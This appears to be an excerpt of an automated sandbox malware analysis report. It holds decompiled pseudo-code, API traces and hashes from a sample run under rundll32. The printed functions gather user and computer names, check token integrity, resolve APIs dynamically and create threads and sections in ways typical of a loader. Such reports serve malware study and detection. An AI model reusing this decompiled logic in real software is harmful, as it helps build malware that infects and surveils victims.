				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00C27DD6();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xc2a2d4; // 0x449d5a8
				_t5 = _t13 + 0xc2b84d; // 0x50c8df5
				_t6 = _t13 + 0xc2b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00C27ABA();
				_t17 = CreateFileMappingW(0xffffffff, 0xc2a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00c266ce
0x00c266d6
0x00c266da
0x00c266e0
0x00c266e5
0x00c266ea
0x00c266ed
0x00c266f0
0x00c266f5
0x00c266f6
0x00c266f9
0x00c266fe
0x00c26705
0x00c2670f
0x00c26711
0x00c26712
0x00c26715
0x00c26731
0x00c26737
0x00c2673b
0x00c26789
0x00c2673d
0x00c2674a
0x00c2675a
0x00c26762
0x00c26774
0x00c26778
0x00000000
0x00000000
0x00c26764
0x00c26767
0x00c2676c
0x00c2676e
0x00c2676e
0x00c2674c
0x00c2674e
0x00c2677a
0x00c2677b
0x00c2677b
0x00c2674a
0x00c26790

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00C243F5,?,00000001,?), ref: 00C266DA
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00C266F0
_snwprintf.NTDLL ref: 00C26715
CreateFileMappingW.KERNELBASE(000000FF,00C2A2F8,00000004,00000000,00001000,?), ref: 00C26731
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C243F5,?), ref: 00C26743
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00C2675A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C243F5), ref: 00C2677B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C243F5,?), ref: 00C26783

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 3a6cd332286778d97546659e993a2d2daaca3f62867cdf19d04ce64332eebbf4
Instruction ID: 7a41ca81086a556b73924cbfc38fa953ed5eed41306f762d46c65886a05e27b3
Opcode Fuzzy Hash: 3a6cd332286778d97546659e993a2d2daaca3f62867cdf19d04ce64332eebbf4
Instruction Fuzzy Hash: 9F21E476A00228FBDB219B64EC45F9D77B9EF48B50F204121FA15E7AD0EB709A019B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2435F, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00C2435F(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00C269CE();
				if(_t27 != 0) {
					_t77 =  *0xc2a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xc2a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xc2a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00C2570A( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xc2a2d4; // 0x449d5a8
					_push(0xc2a2fc);
					_push(1);
					_t7 = _t32 + 0xc2b5bc; // 0x4d283a53
					 *0xc2a2f8 = 0xc;
					 *0xc2a300 = 0;
					L00C22BFF();
					_t36 = E00C266CE(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00C26CD6(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00C25FBC(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xc2a2d4; // 0x449d5a8
								_t18 = _t64 + 0xc2b86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xc2a32c = _t87;
						}
						_t38 = E00C21262();
						 *0xc2a2c8 =  *0xc2a2c8 ^ 0xe8fa7dd7;
						 *0xc2a31c = _t38;
						_t39 = E00C25FBC(0x60);
						__eflags = _t39;
						 *0xc2a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xc2a37c; // 0x50c9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xc2a37c; // 0x50c9630
							 *_t56 = 0xc2b85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xc2a290, _t84, 0x52);
							__eflags = _t42;
							 *0xc2a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xc2a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xc2a2d4; // 0x449d5a8
								_t19 = _t76 + 0xc2b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xc292a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00C26CD6( ~_v8 &  *0xc2a2c8, 0xc2a00c); // executed
								_t84 = E00C2725F(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00C2355C();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00C250A3(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00C22A24(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xc2a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00C2663C(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00c2435f
0x00c2436a
0x00c2436d
0x00c24370
0x00c24373
0x00c2437a
0x00c2437c
0x00c24388
0x00c2438a
0x00c2438a
0x00c24393
0x00c2439b
0x00c2439e
0x00c243b8
0x00c243bd
0x00c243be
0x00c243c0
0x00c243c5
0x00c243ca
0x00c243cc
0x00c243d3
0x00c243dd
0x00c243e3
0x00c243f0
0x00c243f7
0x00c243fc
0x00c243fc
0x00c24405
0x00c2442e
0x00c24431
0x00c2443e
0x00c24445
0x00c24451
0x00c24453
0x00c24455
0x00c2445a
0x00c24460
0x00c24466
0x00c2446c
0x00c2446f
0x00c24474
0x00c2447c
0x00c2447e
0x00c2447e
0x00c24481
0x00c24481
0x00c24487
0x00c2448c
0x00c24494
0x00c24499
0x00c2449e
0x00c244a0
0x00c244a5
0x00c244d4
0x00c244a7
0x00c244ac
0x00c244b1
0x00c244b6
0x00c244bd
0x00c244c3
0x00c244c8
0x00c244ce
0x00c244ce
0x00c244d5
0x00c244d7
0x00c244e6
0x00c244ec
0x00c244ee
0x00c244f3
0x00c2451f
0x00c244f5
0x00c244f5
0x00c244fb
0x00c24508
0x00c2450e
0x00c2450e
0x00c24516
0x00c24518
0x00c24520
0x00c24522
0x00c24529
0x00c24536
0x00c24540
0x00c24542
0x00c24544
0x00000000
0x00000000
0x00c24546
0x00c2454b
0x00c2454d
0x00c24554
0x00c24558
0x00c2455b
0x00c24570
0x00c24574
0x00c24579
0x00000000
0x00c24579
0x00c2455d
0x00c2455f
0x00000000
0x00000000
0x00c24561
0x00c2456a
0x00c2456c
0x00c2456e
0x00000000
0x00000000
0x00000000
0x00c2456e
0x00c24551
0x00c24551
0x00c24522
0x00c24407
0x00c24407
0x00c2440c
0x00c2457b
0x00c2457f
0x00c24587
0x00c24587
0x00000000
0x00c2457f
0x00c24412
0x00c24415
0x00c24415
0x00c24417
0x00c2441a
0x00c24422
0x00c24429
0x00000000
0x00c2458f
0x00c2458f
0x00c24592
0x00c24597
0x00c24597

APIs

Part of subcall function 00C269CE: GetModuleHandleA.KERNEL32(4C44544E,00000000,00C24378,00000000,00000000,00000000,?,?,?,?,?,00C268F7,?,00000001), ref: 00C269DD

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00C2A2FC,00000000), ref: 00C243E3
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00C268F7,?,00000001), ref: 00C243FC
wsprintfA.USER32 ref: 00C2447C
memset.NTDLL ref: 00C244AC
RtlInitializeCriticalSection.NTDLL(050C95F0), ref: 00C244BD
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00C244E6
wsprintfA.USER32 ref: 00C24516

Part of subcall function 00C26CD6: GetUserNameW.ADVAPI32(00000000,00C2453B), ref: 00C26D0D
Part of subcall function 00C26CD6: RtlAllocateHeap.NTDLL(00000000,00C2453B), ref: 00C26D24
Part of subcall function 00C26CD6: GetUserNameW.ADVAPI32(00000000,00C2453B), ref: 00C26D31
Part of subcall function 00C26CD6: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00C2453B,?,?,?,?,?,00C268F7,?,00000001), ref: 00C26D52
Part of subcall function 00C26CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C26D79
Part of subcall function 00C26CD6: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C26D8D
Part of subcall function 00C26CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C26D9A
Part of subcall function 00C26CD6: HeapFree.KERNEL32(00000000,00000000), ref: 00C26DB8

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: dbf3f57269fd99c110374c290ef468206fb123b4d47aa32c3a5bb63c20ad99e0
Instruction ID: 35335e70ba718400bf01fab54ba1d6ce7c4cd54d505d8b757562eab55e9e35cf
Opcode Fuzzy Hash: dbf3f57269fd99c110374c290ef468206fb123b4d47aa32c3a5bb63c20ad99e0
Instruction Fuzzy Hash: FA51E3B1D10635EBDB25EBA8FC85BAE73B8AB04710F100025F918E7E60D774DE419BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C25FD1, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C25FD1(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xc2a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00C25FBC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00C213CC(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00c25fde
0x00c25fe5
0x00c25fec
0x00c26000
0x00c2600b
0x00c26023
0x00c26030
0x00c26033
0x00c26038
0x00c26043
0x00c26047
0x00c26056
0x00c2605a
0x00c26076
0x00c26076
0x00c2607a
0x00c2607a
0x00c2607f
0x00c26083
0x00c26089
0x00c2608a
0x00c26091
0x00c26097

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00C26003
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00C26023
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00C26033
CloseHandle.KERNEL32(00000000), ref: 00C26083

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00C26056
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00C2605E
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00C2606E

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 9ede161f918dce40d78bc2120961d1de9ef991f1d4a92169b402b8755d5099be
Instruction ID: f7df53bedec6e22ce32a97e2712c8d97170f9fa8c89b581dc4d344a3e90093b0
Opcode Fuzzy Hash: 9ede161f918dce40d78bc2120961d1de9ef991f1d4a92169b402b8755d5099be
Instruction Fuzzy Hash: 8F214875900219FFEB119FA0DC84EAEBBB9EB08304F0040A5E911A2661C7714A05EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C27156, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00C27156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xc2a2d4; // 0x449d5a8
				_t1 = _t9 + 0xc2b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00C23420(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x50c9631
					_t40 = E00C25FBC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00C26E5D(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00C213CC(_t40);
						_t42 = E00C2216C(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00C213CC(_t36);
							_t36 = _t42;
						}
						_t43 = E00C24FE5(_t36, _t33);
						if(_t43 != 0) {
							E00C213CC(_t36);
							_t36 = _t43;
						}
					}
					E00C213CC(_t28);
				}
				return _t36;
			}

0x00c27156
0x00c27159
0x00c2715a
0x00c27161
0x00c27168
0x00c2716f
0x00c27173
0x00c2717a
0x00c27181
0x00c27186
0x00c2718e
0x00c27198
0x00c2719c
0x00c271a0
0x00c271a6
0x00c271ab
0x00c271b5
0x00c271bb
0x00c271bd
0x00c271d4
0x00c271d8
0x00c271db
0x00c271e0
0x00c271e0
0x00c271e9
0x00c271ed
0x00c271f0
0x00c271f5
0x00c271f5
0x00c271ed
0x00c271f8
0x00c271fd
0x00c27203

APIs

Part of subcall function 00C23420: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C2716F,253D7325,00000000,00000000,?,00000000,00C24A9F), ref: 00C23487
Part of subcall function 00C23420: sprintf.NTDLL ref: 00C234A8

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C27181
lstrlen.KERNEL32(00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C27189

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

strcpy.NTDLL ref: 00C271A0
lstrcat.KERNEL32(00000000,00000000), ref: 00C271AB

Part of subcall function 00C26E5D: lstrlen.KERNEL32(00000000,00000000,00C24A9F,00000000,?,00C271BA,00000000,00C24A9F,?,00000000,00C24A9F,00000000,050C9630), ref: 00C26E6E

Part of subcall function 00C213CC: RtlFreeHeap.NTDLL(00000000,00000000,00C220F3,00000000,00000000,?,00000000,?,?,?,?,?,00C268A9,00000000,?,00000001), ref: 00C213D8

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00C24A9F,?,00000000,00C24A9F,00000000,050C9630), ref: 00C271C8

Part of subcall function 00C2216C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00C271D4,00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C22176
Part of subcall function 00C2216C: _snprintf.NTDLL ref: 00C221D4

Strings

=, xrefs: 00C271C2

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 8ae67069976964c8bb6ad430b56ecce91ad4b783d61ac024f24d9c5f198bc53d
Instruction ID: bcdbf7a61f33209be367a87a4e8f6e585603b030dff9bd148f4dbc0d3fa763e8
Opcode Fuzzy Hash: 8ae67069976964c8bb6ad430b56ecce91ad4b783d61ac024f24d9c5f198bc53d
Instruction Fuzzy Hash: 2211C23790163A778712BBB8BC85D6F37AD9F897507091115F908A7A12CE34CE02A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 70331E91, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E70331E91(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E70331D8B(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x703341d0 + 0x70335014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x703341d0 + 0x703350e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E70331E7C(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x703341d0 + 0x703350f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x703341d0 + 0x70335104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x703341d0 + 0x70335119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x703341d0 + 0x7033512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E70331382(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x70331e9f
0x70331ea3
0x70331f64
0x70331ea9
0x70331ec1
0x70331ed0
0x70331ed7
0x70331edb
0x70331ede
0x70331f5c
0x70331f5d
0x70331ee0
0x70331eed
0x70331ef1
0x70331ef4
0x00000000
0x70331ef6
0x70331f03
0x70331f07
0x70331f0a
0x00000000
0x70331f0c
0x70331f19
0x70331f1d
0x70331f20
0x00000000
0x70331f22
0x70331f2f
0x70331f33
0x70331f36
0x00000000
0x70331f38
0x70331f3e
0x70331f44
0x70331f49
0x70331f50
0x70331f53
0x00000000
0x70331f55
0x70331f58
0x70331f58
0x70331f53
0x70331f36
0x70331f20
0x70331f0a
0x70331ef4
0x70331ede
0x70331f72

APIs

Part of subcall function 70331D8B: HeapAlloc.KERNEL32(00000000,?,7033188E,?,00000000,00000001,?,?,?,70331576), ref: 70331D97

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,7033123E,?,?,?,?,00000002,00000000,?,?), ref: 70331EB5
GetProcAddress.KERNEL32(00000000,?), ref: 70331ED7
GetProcAddress.KERNEL32(00000000,?), ref: 70331EED
GetProcAddress.KERNEL32(00000000,?), ref: 70331F03
GetProcAddress.KERNEL32(00000000,?), ref: 70331F19
GetProcAddress.KERNEL32(00000000,?), ref: 70331F2F

Part of subcall function 70331382: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 703313DF
Part of subcall function 70331382: memset.NTDLL ref: 70331401

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 879bcc3ccbc0dbb08f89e180b64a760645025007268dd23e83af606f764c31e8
Instruction ID: 467bb711db124da90a7743dde4a69d483bb18de4c9034b40ddcbcac901cf6f59
Opcode Fuzzy Hash: 879bcc3ccbc0dbb08f89e180b64a760645025007268dd23e83af606f764c31e8
Instruction Fuzzy Hash: ED2119B6A0060A9FD710DF69CDC0E5AFBFCEB08744F114569F81AC7215E770E9068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 70331DA0, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x70334188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x7033418c;
						if( *0x7033418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x70334198;
								if( *0x70334198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x7033418c);
						}
						HeapDestroy( *0x70334190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x70334188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x70334190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x703341b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E70331D2D(E7033149B, E7033144A(_a12, 1, 0x70334198, _t41));
							 *0x7033418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x70331da3
0x70331daf
0x70331db1
0x70331db4
0x70331e2a
0x70331e30
0x70331e32
0x70331e34
0x70331e3a
0x70331e3c
0x70331e41
0x70331e44
0x70331e4f
0x70331e51
0x00000000
0x00000000
0x70331e53
0x70331e56
0x70331e58
0x00000000
0x00000000
0x00000000
0x70331e58
0x70331e60
0x70331e60
0x70331e6c
0x70331e6c
0x70331db6
0x70331db7
0x70331dd7
0x70331ddd
0x70331ddf
0x70331de4
0x70331e20
0x70331e20
0x70331de6
0x70331dee
0x70331df5
0x70331dff
0x70331e0b
0x70331e12
0x70331e17
0x70331e1c
0x00000000
0x70331e1c
0x70331e17
0x70331de4
0x70331db7
0x70331e79

APIs

InterlockedIncrement.KERNEL32(70334188), ref: 70331DC2
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 70331DD7

Part of subcall function 70331D2D: CreateThread.KERNELBASE ref: 70331D44
Part of subcall function 70331D2D: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 70331D59
Part of subcall function 70331D2D: GetLastError.KERNEL32(00000000), ref: 70331D64
Part of subcall function 70331D2D: TerminateThread.KERNEL32(00000000,00000000), ref: 70331D6E
Part of subcall function 70331D2D: CloseHandle.KERNEL32(00000000), ref: 70331D75
Part of subcall function 70331D2D: SetLastError.KERNEL32(00000000), ref: 70331D7E

InterlockedDecrement.KERNEL32(70334188), ref: 70331E2A
SleepEx.KERNEL32(00000064,00000001), ref: 70331E44
CloseHandle.KERNEL32 ref: 70331E60
HeapDestroy.KERNEL32 ref: 70331E6C

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: f93da4b2ee42385066b09961788a51f9f72db5851c4ec2b72e5f6cfc9cc19030
Instruction ID: a2d32de82c990c00bf79ce6dbb047ec1141cbaca4d13f9e1d5c6889a5b6accf9
